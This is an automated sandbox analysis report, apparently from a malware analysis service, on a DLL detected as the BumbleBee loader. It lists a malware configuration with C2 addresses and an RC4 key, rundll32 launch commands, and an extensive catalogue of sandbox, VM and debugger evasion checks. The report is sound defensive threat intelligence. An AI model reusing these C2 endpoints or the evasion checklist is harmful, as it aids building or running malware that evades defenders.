Windows Analysis Report
o7m2se.dll

Overview

General Information

Sample Name: o7m2se.dll
Analysis ID: 659464
MD5: cc9f20deaa66ffd5b96b727c2454e141
SHA1: 3b90678ff567417851e8c9953effeda2969abc4d
SHA256: e6c6ad0411501c2d81863c0ecaf80ace8a5e9b6ce8329c5700890eb36991f6fb
Tags: exe

Detection

BumbleBee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected BumbleBee
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contain functionality to detect virtual machines
Searches for specific processes (likely to inject)
C2 URLs / IPs found in malware configuration
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6540 cmdline: loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6552 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6572 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • WerFault.exe (PID: 6752 cmdline: C:\Windows\system32\WerFault.exe -u -p 6572 -s 324 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6560 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6744 cmdline: C:\Windows\system32\WerFault.exe -u -p 6560 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6796 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6880 cmdline: C:\Windows\system32\WerFault.exe -u -p 6796 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6960 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 4448 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 3488 cmdline: C:\Windows\system32\WerFault.exe -u -p 7072 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\system32\WerFault.exe -u -p 7072 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 7096 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7140 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 1596 cmdline: C:\Windows\system32\WerFault.exe -u -p 7140 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 6332 cmdline: C:\Windows\system32\WerFault.exe -u -p 7140 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
{"C2 url": ["146.19.173.184:443", "41.15.71.157:274", "66.9.9.138:154", "36.201.196.202:367", "173.200.61.240:100", "116.241.116.41:410", "242.232.106.206:162", "10.195.46.61:489", "249.112.226.98:243", "130.242.219.205:423", "154.56.0.113:443", "179.5.59.188:228", "217.246.42.10:346", "169.197.227.201:474", "231.228.102.246:186", "185.165.82.120:182", "74.230.15.244:376", "94.88.121.46:403", "120.181.249.142:177", "138.141.158.45:217", "128.79.29.175:298", "104.168.200.192:443", "196.168.84.24:372", "143.27.231.233:335", "133.99.126.202:263", "222.202.140.206:438", "117.172.191.115:471", "158.208.5.127:269", "218.155.13.204:130", "219.110.187.248:435", "209.244.102.105:112", "23.19.58.212:443", "4.177.13.86:289", "204.223.28.129:424", "246.134.183.74:364", "165.132.190.127:368", "89.159.155.176:455", "185.69.113.39:124", "47.26.53.19:195", "41.70.42.112:452", "74.219.241.225:481", "66.15.189.146:122", "28.23.200.103:366", "159.248.192.111:424", "170.88.0.154:120", "79.196.23.192:106", "146.70.106.76:443", "249.57.205.117:166", "62.82.188.190:234", "221.131.148.148:357", "206.245.228.10:133", "51.68.146.186:443", "118.89.112.82:338", "116.205.234.96:247", "205.160.222.15:274", "191.190.49.225:191"], "RC4 Key": "iKInPE9WrB"}
Source | Rule | Description | Author | Strings
00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |
0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |

Source | Rule | Description | Author | Strings
19.2.rundll32.exe.285c8050000.2.raw.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |
14.2.rundll32.exe.21520580000.3.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |
19.2.rundll32.exe.285c8050000.2.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |
14.2.rundll32.exe.21520580000.3.raw.unpack | JoeSecurity_BumbleBee | Yara detected BumbleBee | Joe Security |
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 23.19.58.212:443 Virustotal: Detection: 8%
Source: 19.2.rundll32.exe.285c8050000.2.raw.unpack Malware Configuration Extractor: BumbleBee
Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,2_2_00007FFA535F9C34
Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535EE00C FindFirstFileExA,2_2_00007FFA535EE00C
Source: C:\Windows\System32\rundll32.exe Code function: 14_2_0000021520614570 FindFirstFileExA,14_2_0000021520614570
Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,14_2_00007FFA535F9C34
Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,14_2_00007FFA535F9404
Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535EE00C FindFirstFileExA,14_2_00007FFA535EE00C
Source: C:\Windows\System32\rundll32.exe Code function: 19_2_00000285C80E4570 FindFirstFileExA,19_2_00000285C80E4570

Networking

              Source: WerFault.exe, 00000017.00000002.542446366.000001CE20700000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.540940699.00000186861A0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.541307623.000001F5F3530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_0000021520592270 WSARecv,WSAGetLastError

              E-Banking Fraud

              Source: Yara match File source: 19.2.rundll32.exe.285c8050000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.rundll32.exe.21520580000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 19.2.rundll32.exe.285c8050000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.rundll32.exe.21520580000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000021520627098 appears 77 times
              Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000215205D0900 appears 45 times
              Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000285C80A0900 appears 45 times
              Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000285C80F7098 appears 77 times
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_000002152058C180 VirtualAlloc,GetModuleHandleW,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateThreadEx,GetThreadContext,SetThreadContext,ResumeThread
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535FB25C GetCurrentThreadId,NtOpenFile
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F5694 NtMapViewOfSection
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535FB5B0 GetCurrentThreadId,NtCreateSection
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F615C NtCreateSection,DisconnectNamedPipe
              Source: C:\Windows\System32\rundll32.exe Code function: 19_2_00000285C805C180 VirtualAlloc,GetModuleHandleW,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateThreadEx,GetThreadContext,SetThreadContext,ResumeThread
              Source: o7m2se.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll"
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6560 -s 316
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6572 -s 324
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 316
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf
              Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER76C0.tmpJump to behavior
              Source: classification engine Classification label: mal100.troj.evad.winDLL@33/24@0/1
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00000215205D0410 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,14_2_00000215205D0410
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00000215205D0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,14_2_00000215205D0330
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6560
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6572
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
              Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6796
              Source: rundll32.exe String found in binary or memory: Accept-Additions
              Source: rundll32.exe String found in binary or memory: List-Help
              Source: rundll32.exe String found in binary or memory: MMHS-Exempted-Address
              Source: rundll32.exe String found in binary or memory: Originator-Return-Address
              Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: o7m2se.dll Static PE information: Image base 0x180000000 > 0x60000000
              Source: o7m2se.dll Static file information: File size 1530368 > 1048576
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: o7m2se.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: o7m2se.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: o7m2se.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: o7m2se.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: o7m2se.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: o7m2se.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535EC799 push rdi; ret 2_2_00007FFA535EC7A2
              Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535ED22D push rdi; ret 2_2_00007FFA535ED234
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535ED22D push rdi; ret 14_2_00007FFA535ED234
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535EC799 push rdi; ret 14_2_00007FFA535EC7A2
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C5490 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,SysAllocString,_com_issue_error,VariantInit,VariantInit,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,14_2_00000215205C5490
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D7684 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_00000215205D7684
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\System32\rundll32.exe File opened: HKEY_CURRENT_USER\SOFTWARE\Wine
              Source: C:\Windows\System32\rundll32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: rundll32.exe Binary or memory string: PROCMON.EXE
              Source: rundll32.exe Binary or memory string: HOOKEXPLORER.EXE
              Source: rundll32.exe Binary or memory string: AUTORUNSC.EXE
              Source: rundll32.exe Binary or memory string: JOEBOXSERVER.EXE
              Source: rundll32.exe Binary or memory string: OLLYDBG.EXE
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPCVBOXTRAYTOOLWNDCLASSCHECKING DEVICE %S VIRTUALBOX SHARED FOLDERSVBOXTRAYTOOLWNDVBOXTRAY.EXEVBOXSERVICE.EXESELECT * FROM WIN32_NETWORKADAPTERCONFIGURATIONCHECKING VIRTUALBOX PROCESS %S 08:00:27MACADDRESSVBOXVIDEOW8VBOXVIDEOSELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMSYSTEMFILENAMEVIRTUALBOXSOURCESVBOXVBOXDEVICEIDSELECT * FROM WIN32_PNPENTITYNAMEPCI\VEN_80EE&DEV_CAFE82441FX82801FBOPENHCD82371SBACPIBUS_BUS_0SELECT * FROM WIN32_BUSPNP_BUS_0PCI_BUS_0PRODUCTSELECT * FROM WIN32_BASEBOARDMANUFACTURERVIRTUALBOXSELECT * FROM WIN32_PNPDEVICEORACLE CORPORATIONPNPDEVICEIDCAPTIONVEN_VBOXQEMU-GA.EXEQEMUVDSERVICE.EXEVDAGENT.EXEQEMU-GACHECKING QEMU PROCESSES %S CHECKING QEMU DIRECTORY %S SPICE GUEST TOOLSQEMUQEMUBXPCBOCHSSOFTWARE\WINEWINE_GET_UNIX_FILE_NAMESYSTEM\CONTROLSET001\SERVICES\VIOSCSISYSTEM\CONTROLSET001\SERVICES\VIRTIO-FS SERVICESYSTEM\CONTROLSET001\SERVICES\VIOSTORSYSTEM\CONTROLSET001\SERVICES\BALLOONSYSTEM\CONTROLSET001\SERVICES\VIRTIOSERIALSYSTEM\CONTROLSET001\SERVICES\NETKVMSYSTEM\CONTROLSET001\SERVICES\BALLOONSERVICESYSTEM32\DRIVERS\NETKVM.SYSSYSTEM32\DRIVERS\BALLOON.SYSSYSTEM32\DRIVERS\VIOFS.SYSSYSTEM32\DRIVERS\PVPANIC.SYSSYSTEM32\DRIVERS\VIOINPUT.SYSSYSTEM32\DRIVERS\VIOGPUDO.SYSSYSTEM32\DRIVERS\VIOSCSI.SYSSYSTEM32\DRIVERS\VIORNG.SYSSYSTEM32\DRIVERS\VIOSTOR.SYSSYSTEM32\DRIVERS\VIOSER.SYSVIRTIO-WIN\CURRENTUSEREMILYSANDBOXHONG LEEHAPUBWSJOHNSONIT-ADMINMILOZSMILLERTIMMYPETER WILSONMALWARESAND BOXTEST USERMALTESTJOHN DOEVIRUSCHECKING IF USERNAME MATCHES : %S VMWARESELECT * FROM WIN32_COMPUTERSYSTEMHVM DOMUMODELPROCEXP64.EXEDESKTOPPRL_CC.EXECHECKING PARALLELS PROCESSES: %SPRL_TOOLS.EXE
              Source: rundll32.exe Binary or memory string: QEMU-GA.EXE
              Source: rundll32.exe, rundll32.exe, 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: rundll32.exe Binary or memory string: VMUSRVC.EXE
              Source: rundll32.exe Binary or memory string: REGMON.EXE
              Source: rundll32.exe, 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.546518728.0000021520469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >VMUSRVC.EXEVMSRVC.EXECHECKING VIRTUAL PC PROCESSES %S
              Source: rundll32.exe Binary or memory string: WINDBG.EXE
              Source: rundll32.exe Binary or memory string: AUTORUNS.EXE
              Source: rundll32.exe Binary or memory string: IMPORTREC.EXE
              Source: rundll32.exe Binary or memory string: PETOOLS.EXE
              Source: rundll32.exe Binary or memory string: PROC_ANALYZER.EXE
              Source: rundll32.exe Binary or memory string: SNIFF_HIT.EXE
              Source: rundll32.exe Binary or memory string: JOEBOXCONTROL.EXE
              Source: rundll32.exe Binary or memory string: IDAQ.EXE
              Source: rundll32.exe Binary or memory string: SYSANALYZER.EXE
              Source: rundll32.exe Binary or memory string: DUMPCAP.EXE
              Source: rundll32.exe Binary or memory string: WIRESHARK.EXE
              Source: rundll32.exe Binary or memory string: FILEMON.EXE
              Source: C:\Windows\System32\rundll32.exe Code function: VBOX VBOX VEN_VBOX 14_2_00000215205CEA60
              Source: C:\Windows\System32\rundll32.exe Code function: QEMU QEMU 14_2_00000215205CECF0
              Source: C:\Windows\System32\rundll32.exe Code function: VBoxTrayToolWndClass VBoxTrayToolWnd 14_2_00000215205CCD00
              Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 14_2_00000215205CEDE0
              Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 14_2_00000215205CEEA0
              Source: C:\Windows\System32\rundll32.exe Code function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 14_2_00000215205CD380
              Source: C:\Windows\System32\rundll32.exe Code function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 14_2_00000215205CD4D0
              Source: C:\Windows\System32\rundll32.exe Code function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 14_2_00000215205CD870
              Source: C:\Windows\System32\rundll32.exe Code function: vboxservice.exe vboxservice.exe vboxtray.exe 14_2_00000215205CDA30
              Source: C:\Windows\System32\rundll32.exe Code function: vboxvideo VBoxVideoW8 VBoxWddm 14_2_00000215205CDCC0
              Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 14_2_00000215205CDFD0
              Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 14_2_00000215205CE070
              Source: C:\Windows\System32\rundll32.exe Code function: qemu qemu QEMU QEMU 14_2_00000215205CF080
              Source: C:\Windows\System32\rundll32.exe Code function: vboxservice.exe vboxservice.exe vboxtray.exe 19_2_00000285C809DA30
              Source: C:\Windows\System32\rundll32.exe Code function: vboxvideo VBoxVideoW8 VBoxWddm 19_2_00000285C809DCC0
              Source: C:\Windows\System32\rundll32.exe Code function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 19_2_00000285C809D380
              Source: C:\Windows\System32\rundll32.exe Code function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 19_2_00000285C809D4D0
              Source: C:\Windows\System32\rundll32.exe Code function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 19_2_00000285C809D870
              Source: C:\Windows\System32\rundll32.exe Code function: VBOX VBOX VEN_VBOX 19_2_00000285C809EA60
              Source: C:\Windows\System32\rundll32.exe Code function: QEMU QEMU 19_2_00000285C809ECF0
              Source: C:\Windows\System32\rundll32.exe Code function: VBoxTrayToolWndClass VBoxTrayToolWnd 19_2_00000285C809CD00
              Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 19_2_00000285C809EDE0
              Source: C:\Windows\System32\rundll32.exe Code function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 19_2_00000285C809EEA0
              Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 19_2_00000285C809DFD0
              Source: C:\Windows\System32\rundll32.exe Code function: vbox VBOX 19_2_00000285C809E070
              Source: C:\Windows\System32\rundll32.exe Code function: qemu qemu QEMU QEMU 19_2_00000285C809F080
